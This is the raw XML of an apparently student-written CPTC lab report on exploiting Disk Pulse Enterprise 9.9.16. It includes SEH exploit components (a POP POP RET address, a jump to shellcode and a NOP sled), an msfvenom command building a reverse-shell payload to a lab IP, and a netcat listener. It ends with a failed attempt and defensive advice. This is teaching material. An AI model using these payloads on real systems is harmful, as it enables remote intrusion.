          <w:iCs/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xAD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">\x13\x10' # </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SHE :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EDI POP ESI RET 04 libpal.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2A664D" w14:textId="37C83E83" w:rsidR="007A2C2B" w:rsidRPr="0079343F" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t xml:space="preserve">Second JMP Address: </w:t>
      </w:r>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>'\xE9\x25\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xBF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">' # Second JMP to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ShellCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48539EC5" w14:textId="77777777" w:rsidR="004A6445" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">    d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t xml:space="preserve">Character for NOPSLED: </w:t>
      </w:r>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>'\x90' * 10 # NOPsled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38868602" w14:textId="4A872E3F" w:rsidR="007A2C2B" w:rsidRPr="0079343F" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t>What variable is used to put together the HTTP request with the payload?</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="772D7C9B" wp14:editId="6EC317FA">
            <wp:extent cx="5943600" cy="1811655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79471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3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43F">
        <w:br/>
        <w:t xml:space="preserve">As shown in the above figure, variable </w:t>
      </w:r>
      <w:r w:rsidR="0079343F" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidR="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0079343F">
        <w:t>is used to combine HTTP request with the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCDAD69" w14:textId="77777777" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="641B3F51" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="6463570D" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="3407B0DB" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="185F119E" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="61F2D839" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="7938C923" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="382D3277" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="48E90C7B" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="5AFBDABD" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="35238AAF" w14:textId="7FF2E525" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>Adding our Shellcode and Throwing the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F66FA" w14:textId="5F853462" w:rsidR="004A6445" w:rsidRDefault="004A6445" w:rsidP="004A6445">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6445">
        <w:t>What command do you use to generate Shellcode?</w:t>
      </w:r>
      <w:r w:rsidR="001D750F">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D750F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C575848" wp14:editId="0B5A41BD">
            <wp:extent cx="5362575" cy="3706250"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="2102269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699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5812" cy="37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50F">
        <w:br/>
        <w:t xml:space="preserve">command used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D750F" w:rsidRPr="001D750F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D750F" w:rsidRPr="001D750F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D750F" w:rsidRPr="001D750F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D750F" w:rsidRPr="001D750F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.1.121 LPORT=4443 EXITFUNC=none -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D750F" w:rsidRPr="001D750F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>alpha_mixed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D750F" w:rsidRPr="001D750F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD02614" w14:textId="749B910C" w:rsidR="004A6445" w:rsidRDefault="004A6445" w:rsidP="004A6445">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6445">
        <w:t xml:space="preserve">What are the x86 and x64 payload options for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A6445">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A6445">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A6445">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A6445">
        <w:t xml:space="preserve"> shell?</w:t>
      </w:r>
      <w:r w:rsidR="006658B3">
        <w:br/>
        <w:t xml:space="preserve">EXITFUNC, EXTENTIONS, ETINIT, LHOST and LPORT are payload options for </w:t>
      </w:r>
      <w:r w:rsidR="006658B3" w:rsidRPr="006658B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006658B3" w:rsidRPr="006658B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>meterpreter_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C7B5C41" w14:textId="5AF1E011" w:rsidR="004A6445" w:rsidRDefault="004A6445" w:rsidP="004A6445">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6445">
        <w:t xml:space="preserve">What are the x86 and x64 payload options for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A6445">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A6445">
        <w:t xml:space="preserve"> shell?</w:t>
      </w:r>
      <w:r w:rsidR="006658B3">
        <w:br/>
        <w:t xml:space="preserve">EXITFUNC, LHOST and LPORT are options for </w:t>
      </w:r>
      <w:r w:rsidR="006658B3" w:rsidRPr="006658B3">
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006658B3" w:rsidRPr="006658B3">
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidR="006658B3" w:rsidRPr="006658B3">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E3B656E" w14:textId="3360D35A" w:rsidR="004A6445" w:rsidRDefault="004A6445" w:rsidP="004A6445">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6445">
        <w:t>What options are used to set the callback host and port?</w:t>
      </w:r>
      <w:r w:rsidR="006658B3">
        <w:br/>
        <w:t xml:space="preserve">   a. LHOST</w:t>
      </w:r>
      <w:r w:rsidR="006658B3">
        <w:br/>
        <w:t xml:space="preserve">   b. LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA790F" w14:textId="6980208D" w:rsidR="004A6445" w:rsidRDefault="004A6445" w:rsidP="004A6445">
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6445">
        <w:t>What is the updated IP address of the target running Disk Pulse Enterprise 9.9.16?</w:t>
      </w:r>
      <w:r w:rsidR="006658B3">
        <w:br/>
        <w:t xml:space="preserve">    192.168.1.124</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD04A89" w14:textId="593169B3" w:rsidR="004A6445" w:rsidRDefault="004A6445" w:rsidP="004A6445">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6445">
        <w:t>What command is used to run 42560.py once we are ready to throw the exploit?</w:t>
      </w:r>
      <w:r w:rsidR="006658B3">
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00FA26CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADB8C4A" wp14:editId="63A1C1EF">
            <wp:extent cx="2800350" cy="333375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="126884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47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6CF">
        <w:br/>
        <w:t>command: python 42560.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE4253" w14:textId="396A2B59" w:rsidR="004A6445" w:rsidRPr="004A6445" w:rsidRDefault="004A6445" w:rsidP="004A6445">
      <w:r>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6445">
        <w:t>What commands are run to connect the target to port 4443?</w:t>
      </w:r>
      <w:r w:rsidR="00FA26CF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FA26CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="390DD158" wp14:editId="6224F8E7">
            <wp:extent cx="2981325" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1948718466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18466" name="Picture 1" descr="A blue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7BC2" w14:textId="4F00B7B3" w:rsidR="007A2C2B" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E67D7E" w14:textId="3EF281BC" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Configuring and enabling Web server on Disk Pulse.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="722C3692" wp14:editId="613458E9">
            <wp:extent cx="5743575" cy="4087388"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1507465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659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7341" cy="40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As shown in the figure above port 8080 was set and enabled.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w: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101561">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C342816" wp14:editId="77F2D431">
            <wp:extent cx="3276600" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="374132655" name="Picture 1" descr="A blue background with white text and green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32655" name="Picture 1" descr="A blue background with white text and green arrow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As per as above screenshot, upon executing the payload the connection to the victim’s machine was refused.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>I restarted both the VMs and re-did the lab twice however I still got connection refused error.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC43B40" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="12E31E8C" w14:textId="77777777" w:rsidR="00FA26CF" w:rsidRDefault="00FA26CF" w:rsidP="007A2C2B"/>
    <w:p w14:paraId="1743AE15" w14:textId="2334711F" w:rsidR="004A6445" w:rsidRDefault="004A6445" w:rsidP="004A6445">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Summary of the Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094EB94F" w14:textId="5A09C20A" w:rsidR="00101561" w:rsidRPr="00101561" w:rsidRDefault="00FA26CF" w:rsidP="00101561">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CPTC</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:t xml:space="preserve"> lab </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>teaches how</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:t xml:space="preserve"> to use the Metasploit framework to create an offensive tool which exploits a weakness of the Disk Pulse Enterprise (DPE) software, </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>if successfully executed user</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:t xml:space="preserve"> running DPE may not realize that an </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:t xml:space="preserve"> has penetrated their network and </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t xml:space="preserve">caused </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:t xml:space="preserve">beachhead </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26CF">
        <w:t xml:space="preserve">their network. </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:br/>
        <w:t xml:space="preserve">This lab also shows </w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t xml:space="preserve"> team who maintains </w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve">computer networks </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>must always a</w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve">pply the current security updates recommended by software </w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t>publishers and</w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve"> use other security controls to attempt to detect or reduce </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>the chances</w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>threat actor</w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve"> performing this attack</w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00101561">
        <w:t>Solution</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00101561">
        <w:t xml:space="preserve"> can be to </w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve">deny all outbound traffic to unauthorized IP addresses, and deploying intrusion detection systems </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>which specializes in</w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve"> captur</w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00101561">
        <w:t>sending alerts to the</w:t>
      </w:r>
      <w:r w:rsidR="00101561" w:rsidRPr="00101561">
        <w:t xml:space="preserve"> administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E65D7" w14:textId="71A79B9F" w:rsidR="00FA26CF" w:rsidRPr="00FA26CF" w:rsidRDefault="00101561" w:rsidP="00FA26CF">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-------------------------------------------- End of Lab -------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79499770" w14:textId="6DB5A8DE" w:rsidR="004A6445" w:rsidRPr="007A2C2B" w:rsidRDefault="004A6445" w:rsidP="007A2C2B"/>
    <w:sectPr w:rsidR="004A6445" w:rsidRPr="007A2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57AEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64EABC1A"/>
    <w:lvl w:ilvl="0" w:tplc="D768312A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="252" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Cambria" w:hAnsiTheme="minorHAnsi" w:cs="Cambria" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:w w:val="97"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BC6AE212">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1148" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="669006EC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2096" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F8764C48">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3044" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D932E462">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3992" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="309422E8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4940" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="81AC0F3E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5888" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1512AE0C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6836" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9334AF98">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7784" w:hanging="252"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="158083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B53"/>
    <w:rsid w:val="00101561"/>
    <w:rsid w:val="001132AB"/>
    <w:rsid w:val="0013741F"/>
    <w:rsid w:val="001D750F"/>
    <w:rsid w:val="003D1E5B"/>
    <w:rsid w:val="004A55EB"/>
    <w:rsid w:val="004A6445"/>
    <w:rsid w:val="00654B53"/>
    <w:rsid w:val="006658B3"/>
    <w:rsid w:val="0079343F"/>
    <w:rsid w:val="007A2C2B"/>
    <w:rsid w:val="00AD4DF9"/>
    <w:rsid w:val="00AE259D"/>
    <w:rsid w:val="00FA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2E1F0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6A3BF197-3A54-40FB-B712-CF0AA93D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B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B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4B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B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B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B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B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B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B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B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4B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54B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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4D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4DF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FA26C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A2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xploit-db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Krutarth Panchal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Krutarth Panchal</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-18T10:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-18T22:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>